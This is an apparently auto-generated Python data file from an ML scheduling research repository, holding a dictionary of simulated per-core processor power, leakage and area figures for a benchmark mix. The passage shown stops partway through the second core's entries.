| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
ab6aba6fc9baa0438b92a1d3a38d11c08bac7c9b
| 68,628
|
py
|
Python
|
benchmarks/SimResults/micro_pinned_train_combos/cmpD_bwavesgcccactusADMgromacs/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/micro_pinned_train_combos/cmpD_bwavesgcccactusADMgromacs/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/micro_pinned_train_combos/cmpD_bwavesgcccactusADMgromacs/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.117185,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.294731,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.627684,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.316509,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.548079,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.314339,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.17893,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.216623,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.42355,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.118583,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0114737,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.127051,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.084855,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.245634,
'Execution Unit/Register Files/Runtime Dynamic': 0.0963287,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.339111,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.838867,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 2.81423,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000677553,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000677553,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000585687,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000224289,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00121895,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00315974,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00665572,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0815733,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.18876,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.189269,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.27706,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 7.66295,
'Instruction Fetch Unit/Runtime Dynamic': 0.557718,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.109608,
'L2/Runtime Dynamic': 0.00960751,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 4.43105,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.54581,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.103331,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.103331,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 4.92099,
'Load Store Unit/Runtime Dynamic': 2.15874,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.254797,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.509595,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0904283,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0920702,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.322618,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0310412,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.63745,
'Memory Management Unit/Runtime Dynamic': 0.123111,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 24.3162,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.413709,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0211628,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.158067,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.592939,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 6.25634,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0889114,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.272524,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.563216,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.171676,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.276907,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.139773,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.588356,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.109997,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.98283,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.106404,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00720085,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0819805,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0532547,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.188384,
'Execution Unit/Register Files/Runtime Dynamic': 0.0604556,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.194943,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.509544,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.83626,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 1.96532e-05,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 1.96532e-05,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 1.71469e-05,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 6.6537e-06,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000765008,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.000821462,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.000187397,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0511951,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.25645,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.125991,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.173882,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.63301,
'Instruction Fetch Unit/Runtime Dynamic': 0.352077,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.036246,
'L2/Runtime Dynamic': 0.0100031,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.39724,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.04952,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0698849,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0698849,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.72725,
'Load Store Unit/Runtime Dynamic': 1.46406,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.172324,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.344648,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0611584,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0616879,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.202474,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0206984,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.463642,
'Memory Management Unit/Runtime Dynamic': 0.0823863,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 18.4324,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
